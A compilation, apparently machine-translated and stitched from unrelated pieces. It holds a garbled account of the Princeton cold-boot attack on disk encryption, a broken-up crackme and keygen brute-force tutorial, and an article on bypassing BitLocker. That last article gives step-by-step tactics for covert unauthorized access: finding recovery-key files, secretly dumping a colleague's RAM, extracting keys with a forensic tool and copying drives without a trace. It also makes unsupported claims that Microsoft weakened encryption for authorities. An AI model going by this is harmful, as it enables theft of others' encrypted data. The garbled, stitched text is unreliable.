Versions are encrypted then hack this one. Hacking hard drive encryption systems by cold boot. Safe Sleep

Researchers at Princeton University have discovered a way to bypass hard drive encryption by using the ability of RAM modules to retain information for a short period of time even after a power outage.

Foreword

Since you need to have a key to access an encrypted hard drive, and it is, of course, stored in RAM, all that is needed is to gain physical access to the PC for a few minutes. After rebooting from an external hard drive or from a USB Flash, a complete memory dump is made and the access key is retrieved from it within a few minutes.

In this way, you can get the encryption keys (and full access to the hard drive) used by BitLocker, FileVault and dm-crypt on Windows Vista, Mac OS X and Linux operating systems, as well as the popular free hard drive encryption system TrueCrypt.

The importance of this work lies in the fact that there is no simple method of protection against this method of hacking, except for turning off the power for a sufficient time to completely erase the data.

A visual demonstration of the process is presented in video.

annotation

Contrary to popular belief, the DRAM memory used in most modern computers retains data even after a power outage for several seconds or minutes, moreover, this happens at room temperature and even if the chip is removed from the motherboard. This time is quite enough to take a complete dump of RAM. We will show that this phenomenon allows an attacker who has physical access to the system to bypass the OS functions for protecting data about cryptographic keys. We will show how reboot can be used to make successful attacks on known hard drive encryption systems without the use of any specialized devices or materials. We will experimentally determine the degree and probability of remanence retention and show that the time for which data can be taken can be significantly increased using simple tricks. New methods will also be proposed for finding cryptographic keys in memory dumps and correcting errors associated with missing bits. We will also talk about several ways to reduce these risks, but we do not know of a simple solution.

Introduction

Most experts assume that data from the computer's RAM is erased almost instantly after a power outage, or consider that residual data is extremely difficult to retrieve without the use of special equipment. We will show that these assumptions are incorrect. Conventional DRAM memory loses data gradually over several seconds, even at normal temperatures, and even if the memory chip is removed from the motherboard, data will remain in it for minutes or even hours, provided that the chip is stored at low temperatures. Residual data can be recovered using simple methods that require short-term physical access to the computer.

We will show a number of attacks that, using the remanence effects of DRAM, will allow us to recover the encryption keys stored in memory. This poses a real threat to laptop users who rely on hard drive encryption systems. After all, if an attacker steals a laptop, at the moment when the encrypted disk is connected, he will be able to carry out one of our attacks to access the contents, even if the laptop itself is locked or in sleep mode. We will demonstrate this by successfully attacking several popular encryption systems such as BitLocker, TrueCrypt, and FileVault. These attacks should also be successful against other encryption systems.

Although we have focused our efforts on hard drive encryption systems, in the event of physical access to an attacker's computer, any important information stored in RAM can become an object of attack. It is likely that many other security systems are vulnerable. For example, we found that Mac OS X leaves account passwords in memory where we could retrieve them, and we also attacked Apache's private RSA keys.

Some in the information security and semiconductor physics communities were already aware of the DRAM remanence effect, there was very little information about it. As a result, many who design, develop, or use security systems are simply unfamiliar with this phenomenon and how easily it can be exploited by an attacker. To the best of our knowledge, this is the first detailed work examining the implications of these phenomena for information security.

Attacks on encrypted drives

Encryption of hard drives is a well-known method of protection against data theft. Many believe that hard drive encryption systems will protect their data, even if an attacker has gained physical access to the computer (in fact, they are needed for this, ed.). California law, adopted in 2002, requires reporting possible cases of disclosure of personal data only if the data was not encrypted, because. data encryption is considered to be a sufficient protective measure. Although the law does not describe any specific technical solutions, many experts recommend the use of hard drive or partition encryption systems, which will be considered sufficient measures for protection. The results of our study showed that belief in disk encryption is unfounded. An attacker, far from being the most highly skilled, can bypass many widely used encryption systems if a laptop with data is stolen while it was on or in sleep mode. And data on a laptop can be read even if it is on an encrypted drive, so using hard drive encryption systems is not a sufficient measure.

We used several types of attacks on known hard drive encryption systems. The installation of encrypted disks and verification of the correctness of the detected encryption keys took the most time. Obtaining a RAM image and searching for keys took only a few minutes and was fully automated. There is reason to believe that most hard drive encryption systems are susceptible to such attacks.

bitlocker

BitLocker is a system included with some versions of Windows Vista. It functions as a driver between the file system and the hard disk driver, encrypting and decrypting selected sectors on demand. The keys used for encryption are in RAM as long as the encrypted disk is unmounted.

To encrypt each sector of a hard drive, BitLocker uses the same key pair generated by the AES algorithm: a sector encryption key and an encryption key operating in cipher block chaining (CBC) mode. These two keys are in turn encrypted with the master key. To encrypt a sector, a binary addition procedure is performed on the plaintext with a session key generated by encrypting the sector offset byte with the sector encryption key. Then, the received data is processed by two mixing functions that use the Elephant algorithm developed by Microsoft. These keyless functions are used to increase the number of changes to all bits of the cipher and, accordingly, increase the uncertainty of the encrypted sector data. At the last stage, the data is encrypted with the AES algorithm in CBC mode, using the appropriate encryption key. The initialization vector is determined by encrypting the sector offset byte with the encryption key used in CBC mode.

We have implemented a fully automated demo attack called BitUnlocker. This uses an external USB drive with Linux OS and a modified bootloader based on SYSLINUX and the FUSE driver that allows you to connect BitLocker encrypted drives to Linux OS. On a test computer running Windows Vista, the power was turned off, a USB hard drive was connected, and booted from it. After that, BitUnlocker automatically dumped the RAM to an external drive, searched for possible keys using the keyfind program, tried all the suitable options (pairs of the sector encryption key and the CBC mode key), and, if successful, connected the encrypted drive. As soon as the disk was connected, it became possible to work with it like with any other disk. On a modern laptop with 2 gigabytes of RAM, the process took about 25 minutes.

It is noteworthy that this attack became possible to carry out without reverse engineering of any software. The Microsoft documentation describes the BitLocker system sufficiently to understand the role of the sector encryption key and the CBC mode key and create your own program that implements the entire process.

The main difference between BitLocker and other programs of this class is the way in which keys are stored when the encrypted drive is disconnected. By default, in basic mode, BitLocker protects the master key only with the help of the TPM module, which exists on many modern PCs. This method, which seems to be widely used, is especially vulnerable to our attack, since it allows you to get encryption keys even if the computer has been turned off for a long time, because when the PC boots up, the keys are automatically loaded into RAM (until login window) without entering any authentication data.

Apparently, Microsoft experts are familiar with this problem and therefore recommend configuring BitLocker in an improved mode, where keys are protected not only with the help of TPM, but also with a password or a key on an external USB drive. But, even in this mode, the system is vulnerable if an attacker gains physical access to the PC while it is running (it can even be locked or in sleep mode, (states - just turned off or hibernate in this case are considered not affected by this attack).

File Vault

Apple's FileVault system has been partially researched and reverse engineered. On Mac OS X 10.4, FileVault uses a 128-bit AES key in CBC mode. When a user password is entered, a header is decrypted containing the AES key and a second K2 key used to calculate the initialization vectors. The initialization vector for the Ith disk block is calculated as HMAC-SHA1 K2(I).

We used our EFI program to capture RAM images to retrieve data from a Macintosh computer (based on an Intel processor) with a FileVault encrypted drive attached. The keyfind program then found the FileVault AES keys automatically without error.

Without an initialization vector, but with the received AES key, it becomes possible to decrypt 4080 out of 4096 bytes of each disk block (everything except the first AES block). We made sure that the initialization vector is also in the dump. Assuming that the data has not been corrupted, an attacker can determine the vector by trying all the 160-bit strings in the dump one by one and checking if they can form a possible plaintext when they are binary added to the decrypted first part of the block. Together, using programs like vilefault, AES keys and an initialization vector allow you to completely decrypt an encrypted disk.

While investigating FileVault, we found that Mac OS X 10.4 and 10.5 leave multiple copies of a user's password in memory, where they are vulnerable to this attack. Account passwords are often used to protect keys, which in turn can be used to protect passphrases on FileVault encrypted drives.

TrueCrypt

TrueCrypt is a popular open source encryption system that runs on Windows, MacOS and Linux. It supports many algorithms including AES, Serpent and Twofish. In version 4, all algorithms worked in LRW mode; in the current 5th version, they use the XTS mode. TrueCrypt stores the encryption key and tweak key in the partition header on each drive, which is encrypted with a different key derived from the user's entered password.

We tested TrueCrypt 4.3a and 5.0a running under Linux OS. We connected a disk encrypted with a 256-bit AES key, then turned off the power and used our own memory dump software to boot. In both cases, keyfind found a 256-bit intact encryption key. Also, in the case of TrueCrypt 5.0.a, keyfind was able to recover the XTS mode tweak key.

To decrypt disks created by TrueCrypt 4, you need to tweak the LRW mode key. We found that the system stores it in four words before the key AES key schedule. In our dump, the LRW key was not corrupted. (In the event of errors, we would still be able to recover the key).

Dm-crypt

The Linux kernel, starting with version 2.6, includes built-in support for dm-crypt, a disk encryption subsystem. Dm-crypt uses many algorithms and modes, but by default it uses a 128-bit AES cipher in CBC mode with non-key-based initialization vectors.

We tested the created dm-crypt partition using the LUKS (Linux Unified Key Setup) branch of the cryptsetup utility and the 2.6.20 kernel. The disk was encrypted using AES in CBC mode. We turned off the power for a while and using a modified PXE bootloader, we did a memory dump. The keyfind program found a valid 128-bit AES key, which was recovered without any errors. After it is restored, an attacker can decrypt and mount the dm-crypt encrypted partition by modifying the cryptsetup utility so that it accepts the keys in the required format.

Protection methods and their limitations

The implementation of protection against attacks on RAM is not trivial, since the cryptographic keys used must be stored somewhere. We propose to focus on destroying or hiding keys before an attacker can gain physical access to the PC, preventing the main memory dump software from running, physically protecting the RAM chips, and, if possible, reducing the data retention period in the RAM.

Memory overwrite

First of all, it is necessary, if possible, to avoid storing keys in RAM. It is necessary to overwrite key information when it is no longer used, and prevent data from being copied to swap files. Memory must be cleared in advance by means of the OS or additional libraries. Naturally, these measures will not protect the keys currently in use, as they must be kept in memory, such as those used for encrypted disks or on secure web servers.

Also, the RAM must be cleared during the boot process. Some PCs can be configured to clear RAM on boot using a clear POST request (Power-on Self-Test) before booting the OS. If an attacker cannot prevent the execution of this request, then on this PC he will not be able to make a memory dump with important information. But, he still has the opportunity to pull out the RAM chips and insert them into another PC with the BIOS settings he needs.

Restricting downloads from the network or from removable media

Many of our attacks were implemented using network boot or removable media. The PC must be configured to require an administrator password to boot from these sources. But, it should be noted that even if the system is configured to boot only from the main hard drive, an attacker can change the hard drive itself, or in many cases, reset the computer's NVRAM to revert to the original BIOS settings.

Safe Sleep

The results of the study showed that simply locking the PC desktop (that is, the OS continues to work, but in order to start interacting with it, a password must be entered) does not protect the contents of RAM. Sleep mode is not effective even if the PC is blocked when returning from sleep mode, because an attacker can activate the return from sleep mode, then restart the laptop and make a memory dump. The hibernate mode (the contents of the RAM is copied to the hard disk) will also not help, except when using key information on alienated media to restore normal operation.

With most hard drive encryption systems, users can protect themselves by shutting down the PC. (The Bitlocker system in the basic mode of the TPM module remains vulnerable, since the disk will be connected automatically when the PC is turned on). The contents of the memory may be retained for a short period after being turned off, so it is recommended that you monitor your workstation for a couple more minutes. Despite its effectiveness, this measure is extremely inconvenient due to the long loading of workstations.

Hibernation can be secured in the following ways: require a password or some other secret to "wake up" the workstation, and encrypt the contents of memory with a key derived from this password. The password must be strong, as an attacker can dump the memory and then try to guess the password by brute force. If it is not possible to encrypt the entire memory, only those areas that contain key information need to be encrypted. Some systems may be configured to enter this type of protected sleep, although this is usually not the default setting.

Rejection of precalculations

Our research has shown that using precomputation to speed up cryptographic operations makes key information more vulnerable. Precomputation leads to the fact that in memory there is redundant information about key data, which allows an attacker to recover the keys even if there are errors. For example, as described in Section 5, information about the iteration keys of the AES and DES algorithms is extremely redundant and useful to an attacker.

Rejecting precomputations will reduce performance, as potentially complex calculations will have to be repeated. But, for example, you can cache pre-calculated values for a certain period of time and erase the received data if they are not used during this interval. This approach represents a compromise between security and system performance.

Key expansion

Another way to prevent key recovery is to change the key information stored in memory in such a way as to make key recovery more difficult due to various errors. This method was considered in theory, where a function was shown to be resistant to disclosure, whose inputs remain hidden even if almost all of the outputs were discovered, which is very similar to the operation of one-way functions.

In practice, imagine that we have a 256-bit AES key K that is not currently in use but will be needed later. We can't overwrite it, but we want to make it resistant to recovery attempts. One way to achieve this is to allocate a large B-bit data area, fill it with random data R, and then store in memory the result of the following transformation K + H (R) (binary summation, approx. ed.), where H is a hash function, such as SHA-256.

Now imagine that the electricity was turned off, this will cause d bits in this area to be changed. If the hash function is strong, when attempting to recover the key K, an attacker can only rely on being able to guess which bits of area B have been changed out of about half that could have changed. If d bits have been changed, the attacker will have to search for a region of size (B/2+d)/d to find the correct values of R and then recover the key K. If the region B is large, such a search can be very long, even if d is relatively small.

Theoretically, we can store all the keys in this way, calculating each key only when we need it, and deleting it when we don't need it. Thus, by applying the above method, we can store the keys in memory.

Physical protection

Some of our attacks relied on having physical access to memory chips. Such attacks can be prevented by physical memory protection. For example, the memory modules are kept in a closed PC case, or sealed with epoxy to prevent attempts to remove or access them. Also, it is possible to implement memory overwriting as a response to low temperatures or attempts to open the case. This method will require the installation of sensors with an independent power supply system. Many of these methods involve tamper-proof hardware (such as the IBM 4758 coprocessor) and can greatly increase the cost of a workstation. On the other hand, using memory soldered to the motherboard is much cheaper.

Change of architecture

You can change the PC architecture. Which is impossible for already used PCs, but it will allow you to secure new ones.

The first approach is to design DRAM modules in such a way that they erase all data faster. This can be tricky because the goal of erasing data as quickly as possible conflicts with the other goal of not losing data between memory refresh periods.

Another approach is to add key storage hardware that is guaranteed to erase all information from its storage on startup, restart, and shutdown. Thus, we will get a safe place to store several keys, although the vulnerability associated with their precomputation will remain.

Other experts have proposed an architecture in which the contents of the memory will be permanently encrypted. If, in addition to this, we implement the erasing of keys on reboot and power outage, then this method will provide sufficient protection against the attacks we have described.

Trusted Computing

Hardware corresponding to the concept of "trusted computing", for example, in the form of TPM modules, is already used in some PCs. Despite their usefulness in protecting against some attacks, in their current form, such equipment does not help prevent the attacks we have described.

The TPM modules used do not implement full encryption. Instead, they watch the boot process to decide whether it is safe to boot the key into RAM or not. If the software needs to use the key, then the following technology can be implemented: the key, in a usable form, will not be stored in RAM until the boot process goes according to the expected scenario. But, as soon as the key is in RAM, it immediately becomes a target for our attacks. TPM modules can prevent the key from being loaded into memory, but they do not prevent it from being read from memory.

findings

Contrary to popular belief, DRAM modules store data for a relatively long time when disabled. Our experiments have shown that this phenomenon makes it possible to implement a whole class of attacks that allow you to get important data, such as encryption keys, from RAM, despite the OS's attempts to protect its contents. The attacks we describe are realizable in practice, and our examples of attacks on popular encryption systems prove this.

But other types of software are also vulnerable. Digital rights management (DRM) systems often use symmetric keys stored in memory, and these can also be obtained using the methods described. As we have shown, SSL-enabled web servers are also vulnerable because they store in memory the private keys needed to create SSL sessions. Our methods of searching for key information are likely to be effective for finding passwords, account numbers, and any other important information stored in RAM.

It seems that there is no easy way to eliminate the vulnerabilities found. Changing the software will most likely not be effective; hardware changes will help, but the time and resource costs will be high; the technology of "trusted computing" in its current form is also not very effective, since it cannot protect the keys that are in memory.

In our opinion, laptops that are often in public places and operate in modes vulnerable to these attacks are most exposed to this risk. The presence of such risks shows that disk encryption protects important data to a lesser extent than is commonly believed.

As a result, you may have to consider DRAM memory as an untrusted component of a modern PC, and avoid processing important confidential information in it. But at the moment this is not practical, until the architecture of modern PCs changes to allow software to store keys in a safe place.

INTRODUCTION

Krakmi it
program (usually small size 1-2
kilobyte) to which you need to guess the password
or make a key. Krakmi is usually written
to check the level of knowledge of people in the field
cryptography and hacking programs. Krak mi
came from the English phrase Crack Me -
crack me.

somehow to me
it was required to insert support for "registration"
keys to one of the commercial programs. On the
that moment of experience in this matter I had
quite a bit, somehow I tried to hack
a few crackme, but nothing worked and I
threw quickly. But when the stimulus came, I
I decided to start with crackme and now I'm doing it
learning different encryption algorithms
data (such as DES, TWODES, RSA, and others). Quite
it is possible that my next articles will be about
encryption algorithms,
the use of these algorithms is significantly
increases the time spent on hacking.

TYPES OF CRACKME

Considering
various cracks, I singled out two main
type: encrypted crakmi and containing
just an algorithm.

Decoder
Krakmi of the first kind usually contains
many anti-debugging “tricks” (complexity
of these techniques depends on the level of knowledge
the person who wrote the krakmi, the most
common tricks are easily bypassed
people and debuggers working under
protected mode and before
to start analyzing the algorithm, you need to get
decrypted code. The harder
decipher, the (most likely) more difficult
there will be an algorithm for selecting a password (or passwords)
to him. Very often it turns out that
an algorithm of 300 bytes can be harder to break,
than to decipher krakmi. Without knowledge
mathematicians also do not advise breaking cracks
which use the RSA algorithm (algorithm
encryption of data with a public key) or
similar. Naturally, it is better to start with
unencrypted cracks. I also don't recommend
trying to break crakmi from groups UCL, UCF, rPG, SOS
- You're just wasting your time.

In some
Krakmi needs to know not the password, but
make a registration key. Process
scrap like crakmi not much
different from the “password”, but it is more “approximate”
to break programs.

BREAK ALGORITHM
CRACKME

Complex cracks
broken by brute-force passwords, for
small programs are written for this. More often
there is only one password. Complexity
increases due to the size of the required
password and characters from which it must
consist.

Algorithm:

Analysis
password verification algorithm

Writing
keygen (password guesser)

Keygen launch

ALGORITHM ANALYSIS
PASSWORD CHECK

For analysis
the algorithm should be carefully studied
password verification. For this, your
favorite debugger (Soft Ice, TD, DeGlucker...), you need
look carefully at what is being checked
password. It can be checked against
sum (crc), in this case, most likely the password
will have to search by brute force, or he may
check for some character, then
you can "guess" the entire password, or at least
a few of its characters, the rest will have to
search by search.

Control
the sum of the code section, this is a number (usually two
or four bytes, in krami can
used and one byte) which
contains information about this piece of code.
For krakmi, procedures are commonly used
primitive checksum calculation (for example
archivers use crc32). Consider
example of an algorithm that calculates
checksum:

For example, all
the bytes of the plot are added up, and it turns out
number is a number and is a control
area amount. For example, we have a plot
code, consisting of 5 bytes:

001 004 000 005 100

Control
its sum will be equal to 1+4+0+5+100=110.

Main
the difficulty of hacking cracks that check
the password for crc is that crc cannot be decomposed! Those.
knowing the password checksum - 110 we do not
we can find out what at least one of
password elements.

WRITING A KEYGEN

Practically for
all types of crackers need to write a keygen,
except for the lungs. Can be easily broken
almost any krami bit hack (bit hack,
replacement of several bytes), but the authors ask
say the password, and the most important thing is lost
interest.

In order to
to find a password of 3 characters is necessary
sort of roughly:255
* 255 * 255 COMBINATIONS

Can be reduced
number of combinations, for example knowing that in
password uses only english
letters (large and small), then instead of 255
characters will have to iterate only 52. If
only numbers that we will iterate over only 10
characters.

Keygen should
save the counter of decrypted
combinations. Since brute-force passwords
takes a long time, then leave
you can’t turn on the computer for a couple of days,
all of a sudden you need it. Can be inserted into
keygen the ability to save the counter in
file, and at startup read it from the file and
continue decryption from the interrupted
positions.

LAUNCH KEYGEN

brute-force passwords,
depending on some parameters (in
mainly on the number of possible passwords
characters and password size) requires
a fairly large period of time.
Multiple computers can be used
each of which will check some
some of the combinations.

Many use the Windows encryption feature, but not everyone thinks about the security of this data protection method. Today we will talk about Bitlocker encryption and try to figure out how well Windows disk protection is implemented.

By the way, you can read about how to set up Bitlocker in the article "".

Foreword
How does Bitlocker work?

Vulnerabilities
Recovery keys
Opening BitLocker
BitLocker To Go

Conclusion

The article is written for research purposes. All information in it is for informational purposes only. It is addressed to security professionals and those who want to become one.

How does Bitlocker work?

What is Bitlocker?

BitLocker is a native disk encryption feature in Windows 7, 8, 8.1, 10 operating systems. This feature allows you to securely encrypt confidential data on your computer, both on HDD and SSD, and on removable media.

How is BitLocker set up?

The reliability of BitLocker should not be judged by the reputation of AES. A popular encryption standard may not have frankly weak points, but its implementations in specific cryptographic products often abound with them. Microsoft does not disclose the full code for BitLocker technology. It is only known that in different versions of Windows it was based on different schemes, and the changes were not commented on in any way. Moreover, in build 10586 of Windows 10, it simply disappeared, and after two builds it reappeared. However, first things first.

The first version of BitLocker used ciphertext block chaining (CBC) mode. Even then, its shortcomings were obvious: ease of attack on a known text, poor resistance to attacks by the type of substitution, and so on. Therefore, Microsoft immediately decided to strengthen protection. Already in Vista, the Elephant Diffuser algorithm was added to the AES-CBC scheme, making it difficult to directly compare ciphertext blocks. With it, the same contents of two sectors, after encryption with one key, gave a completely different result, which complicated the calculation of a common pattern. However, the default key itself was short - 128 bits. Through administrative policies, it can be extended to 256 bits, but is it worth it?

For users, after changing the key, nothing will change outwardly - neither the length of the entered passwords, nor the subjective speed of operations. Like most full disk encryption systems, BitLocker uses multiple keys... and none of them are visible to users. Here is a schematic diagram of BitLocker.

When BitLocker is activated using a pseudo-random number generator, a master bit sequence is generated. This is the volume encryption key - FVEK (full volume encryption key). It is he who now encrypts the contents of each sector.
In turn, FVEK is encrypted using another key - VMK (volume master key) - and stored in encrypted form among the volume metadata.
The VMK itself is also encrypted, but in different ways at the user's choice.
On new motherboards, the VMK key is encrypted by default using the SRK key (storage root key), which is stored in a separate cryptoprocessor - a trusted platform module (TPM). The user does not have access to the TPM content, and it is unique to each computer.
If there is no separate TPM chip on the board, then instead of SRK, a user-entered pin code or an on-demand USB flash drive with key information pre-written on it is used to encrypt the VMK key.
In addition to the TPM or flash drive, you can protect the VMK key with a password.

This general behavior of BitLocker continued in subsequent releases of Windows up until the present. However, BitLocker's key generation and encryption modes have changed. So, in October 2014, Microsoft quietly removed the additional Elephant Diffuser algorithm, leaving only the AES-CBC scheme with its known shortcomings. At first, no official statements were made about this. People were simply given a weakened encryption technology with the same name under the guise of an update. Vague explanations for this move followed after the simplifications in BitLocker were noticed by independent researchers.

Formally, the removal of Elephant Diffuser was required to ensure that Windows complies with US Federal Information Processing Standards (FIPS), but one argument refutes this version: Vista and Windows 7, which used Elephant Diffuser, were sold without problems in America.

Another imaginary reason for the refusal of the additional algorithm is the lack of hardware acceleration for Elephant Diffuser and the loss in speed when using it. However, in previous years, when processors were slower, for some reason the speed of encryption suited them. And the same AES was widely used even before there were separate instruction sets and specialized chips for its acceleration. Over time, it was possible to make hardware acceleration for Elephant Diffuser as well, or at least give customers a choice between speed and security.

Another, unofficial version looks more realistic. The "elephant" got in the way of employees who wanted to spend less effort decrypting the next disk, and Microsoft willingly interacts with authorities even in cases where their requests are not entirely legal. Indirectly confirms the conspiracy theory and the fact that before Windows 8, when creating encryption keys in BitLocker, the pseudo-random number generator built into Windows was used. In many (if not all) releases of Windows, this was Dual_EC_DRBG - a "cryptographic strong PRNG" developed by the US National Security Agency and containing a number of inherent vulnerabilities.

Of course, the secret weakening of the built-in encryption caused a powerful wave of criticism. Under her pressure, Microsoft rewrote BitLocker again, replacing PRNG with CTR_DRBG in new releases of Windows. Additionally, in Windows 10 (starting with build 1511), the default encryption scheme is AES-XTS, which is immune to ciphertext block manipulation. In the latest builds of the “tens”, other known BitLocker shortcomings were fixed, but the main problem still remained. It is so absurd that it makes other innovations meaningless. It's about the principles of key management.

The task of decrypting BitLocker drives is also made easier by the fact that Microsoft is actively promoting an alternative method of restoring access to data through the Data Recovery Agent. The meaning of the "Agent" is that it encrypts the encryption keys of all drives within the enterprise network with a single access key. Once you have it, you can decrypt any key, and thus any disk used by the same company. Conveniently? Yes, especially for hacking.

The idea of using one key for all locks has already been compromised many times, but it continues to be returned in one form or another for the sake of convenience. Here is how Ralph Leighton recorded Richard Feynman's memoirs about one characteristic episode of his work on the Manhattan project at the Los Alamos laboratory: “... I opened three safes - and all three with one combination. I did them all: I opened the safes with all the secrets of the atomic bomb - the technology for obtaining plutonium, a description of the purification process, information about how much material is needed, how the bomb works, how neutrons are made, how the bomb is arranged, what are its dimensions - in short, everything, what they knew in Los Alamos, the whole kitchen!

BitLocker is somewhat reminiscent of the safe device described in another fragment of the book "Of course you are joking, Mr. Feynman!". The most imposing safe in the top-secret laboratory had the same vulnerability as a simple filing cabinet. “... It was a colonel, and he had a much more tricky, two-door safe with large handles that pulled four steel rods three-quarters of an inch thick from the frame. I looked at the back of one of the imposing bronze doors and found that the digital dial was connected to a small padlock that looked exactly like the lock on my Los Alamos closet. It was obvious that the system of levers depended on the same small rod that locked the filing cabinets .. Depicting some kind of activity, I began to twist the dial at random. Two minutes later - click! - The safe was opened. When the safe door or the top drawer of the filing cabinet is open, it is very easy to find the combination. That is what I did when you read my report, just to show you the danger."

BitLocker crypto containers are quite secure on their own. If someone brings you a flash drive that comes from nowhere, encrypted with BitLocker To Go, then you are unlikely to decrypt it in a reasonable time. However, in a real scenario using encrypted drives and removable media, there are many vulnerabilities that are easy to use to bypass BitLocker.

BitLocker Vulnerabilities

Surely you have noticed that when you first activate Bitlocker, you have to wait a long time. This is not surprising - the process of sector-by-sector encryption can take several hours, because it is not even possible to read all blocks of terabyte HDDs faster. However, disabling BitLocker happens almost instantly - how come?

The fact is that when disabled, Bitlocker does not decrypt the data. All sectors will remain encrypted with the FVEK key. Simply, access to this key will no longer be limited in any way. All checks will be disabled, and the VMK will remain recorded among the cleartext metadata. Each time you turn on the computer, the OS loader will read the VMK (already without checking the TPM, requesting a key on a flash drive or password), automatically decrypting FVEK with it, and then all files as they are accessed. For the user, everything will look like a complete lack of encryption, but the most attentive ones may notice a slight decrease in the performance of the disk subsystem. More precisely - the lack of an increase in speed after disabling encryption.

There is something else interesting in this scheme. Despite the name (full disk encryption technology), some of the data when using BitLocker still remains unencrypted. MBR and BS remain in open form (unless the disk was initialized in GPT), bad sectors and metadata. An open bootloader gives room for imagination. In pseudo-bad sectors, it is convenient to hide other malware, and metadata contains a lot of interesting things, including copies of keys. If Bitlocker is active, then they will be encrypted (but weaker than FVEK encrypts the contents of the sectors), and if it is deactivated, they will simply lie in the clear. These are all potential attack vectors. They are potential because, in addition to them, there are much simpler and more universal ones.

Bitlocker recovery key

In addition to FVEK, VMK, and SRK, BitLocker uses another type of key that is generated "just in case". These are the recovery keys with which another popular attack vector is associated. Users are afraid to forget their password and lose access to the system, and Windows itself recommends that they make an emergency login. To do this, the BitLocker Encryption Wizard in the last step prompts you to create a recovery key. Refusal to create it is not provided. You can only choose one of the key export options, each of which is very vulnerable.

In the default settings, the key is exported as a simple text file with a recognizable name: "BitLocker recovery key #", where the computer ID is written instead of # (yes, right in the file name!). The key itself looks like this.

If you forgot (or never knew) the password set in BitLocker, then just look for the file with the recovery key. Surely it will be saved among the documents of the current user or on his flash drive. Maybe it's even printed on a piece of paper, as Microsoft recommends.

To quickly find the recovery key, it is convenient to limit the search by extension (txt), date of creation (if you know approximately when BitLocker could have been enabled), and file size (1388 bytes if the file has not been edited). Once you find the recovery key, copy it. With it, you can bypass the standard authorization in BitLocker at any time. To do this, just press Esc and enter the recovery key. You will log in without problems and even be able to change the password in BitLocker to an arbitrary one without specifying the old one!

Opening BitLocker

Real cryptographic the system is a compromise between convenience, speed and reliability. It should include procedures for transparent encryption with on-the-fly decryption, methods for recovering forgotten passwords and convenient work with keys. All this weakens any system, no matter how strong algorithms it is based on. Therefore, it is not necessary to look for vulnerabilities directly in the Rijndael algorithm or in different schemes of the AES standard. It is much easier to find them in the specifics of a particular implementation.

In the case of Microsoft, this "specificity" is enough. For example , copies of BitLocker keys are by default sent to SkyDrive and escrowed in Active Directory .

Well, what if you lose them... or Agent Smith asks. It is inconvenient to make a client wait, and even more so an agent. For this reason, the comparison cryptographic strength AES-XTS and AES-CBC with Elephant Diffuser fade into the background, as do recommendations to increase the key length. No matter how long it is, the attacker will easily get it in unencrypted form .

Retrieving escrowed keys from a Microsoft or AD account is the main way to break BitLocker. If the user has not registered an account in the Microsoft cloud, and his computer is not in the domain, then there will still be ways to extract the encryption keys. In the course of normal operation, their open copies are always stored in RAM (otherwise there would be no "transparent encryption"). This means they are available in her dump and hibernation file.

Why are they kept there at all?

As it is ridiculous - for convenience smile . BitLocker was designed to protect against offline attacks only. They are always accompanied by rebooting and connecting the disk to another OS, which leads to clearing the RAM. However, in the default settings, the OS dumps the RAM when a failure occurs (which can be provoked) and writes all its contents to the hibernation file each time the computer goes into deep sleep. So if you've recently signed in to Windows with BitLocker enabled, there's a good chance you'll get a decrypted copy of the VMK and use it to decrypt the FVEK and then the data itself down the chain.

Let's check? All the BitLocker hacking methods described above are collected in one program - Forensic Disk Decryptor, developed by the domestic company Elcomsoft. It can automatically extract encryption keys and mount encrypted volumes as virtual drives , decrypting them on the fly .

Additionally, EFDD implements another non-trivial way of obtaining keys - by attacking through the FireWire port, which is advisable to use in the case when it is not possible to run your software on the computer under attack. We always install the EFDD program itself on our computer, and on the hacked one we try to manage with the minimum necessary actions.

For example, let's just run a test system with BitLocker active and "invisibly" make a memory dump. So we will simulate a situation in which a colleague went out for lunch and did not lock his computer. We launch RAM Capture and in less than a minute we get a complete dump in a file with the .mem extension and a size corresponding to the amount of RAM installed on the victim's computer.

Than to do a dump - by and large without a difference. Regardless of the extension, this will turn out to be a binary file, which will then be automatically analyzed by EFDD in search of keys.

We write the dump to a USB flash drive or transfer it over the network, after which we sit down at our computer and run EFDD.

Select the "Extract keys" option and enter the path to the file with the memory dump as the source of the keys.

BitLocker is a typical crypto container, like PGP Disk or TrueCrypt. These containers turned out to be quite reliable on their own, but client applications for working with them under Windows litter encryption keys in RAM. Therefore, a universal attack scenario is implemented in EFDD. The program instantly searches for encryption keys from all three types of popular crypto containers. Therefore, you can leave all the items checked - what if the victim secretly uses or PGP!

After a few seconds, Elcomsoft Forensic Disk Decryptor shows all found keys in its window. For convenience, they can be saved to a file - this will come in handy in the future.

Now BitLocker is no longer a hindrance! You can carry out a classic offline attack - for example, pull out a hard drive and copy its contents. To do this, simply connect it to your computer and run EFDD in "decrypt or mount disk" mode.

After specifying the path to the files with saved keys, EFDD of your choice will perform a full decryption of the volume or immediately open it as a virtual disk. In the latter case, the files are decrypted as they are accessed. Either way, no changes are made to the original volume, so you can return it the next day as if nothing had happened. Working with EFDD occurs without a trace and only with copies of the data, and therefore remains invisible.

BitLocker To Go

Starting with the "seven" in Windows, it became possible to encrypt flash drives, USB-HDDs and other external media. A technology called BitLocker To Go encrypts removable drives in the same way as local drives. Encryption is enabled by the corresponding item in the Explorer context menu.

For new drives, you can use encryption of only the occupied area - all the same, the free space of the partition is full of zeros and there is nothing to hide there. If the drive has already been used, it is recommended to enable full encryption on it. Otherwise, a location marked as free will remain unencrypted. It may contain in plain text recently deleted files that have not yet been overwritten.

Even fast encryption of only a busy area takes from several minutes to several hours. This time depends on the amount of data, the bandwidth of the interface, the characteristics of the drive, and the speed of the cryptographic calculations of the processor. Since encryption is accompanied by compression, the free space on the encrypted disk usually increases slightly.

The next time you connect an encrypted flash drive to any computer running Windows 7 or later, the BitLocker wizard will automatically launch to unlock the drive. In Explorer, before unlocking, it will be displayed as a locked disk.

Here you can use both the BitLocker workarounds already discussed (for example, looking for the VMK key in a memory dump or hibernation file), and new ones related to recovery keys.

If you do not know the password, but you managed to find one of the keys (manually or using EFDD), then there are two main options for accessing the encrypted flash drive:

use the built-in BitLocker wizard to work directly with the flash drive;
use EFDD to fully decrypt the flash drive and create its sector-by-sector image.

The first option allows you to immediately access the files recorded on the flash drive, copy or change them, and also burn your own. The second option takes much longer (from half an hour), but it has its advantages. The decrypted sector-by-sector image allows you to further perform a more subtle analysis of the file system at the level of a forensic laboratory. In this case, the flash drive itself is no longer needed and can be returned unchanged.

The resulting image can be opened immediately in any program that supports the IMA format, or first converted to another format (for example, using UltraISO).

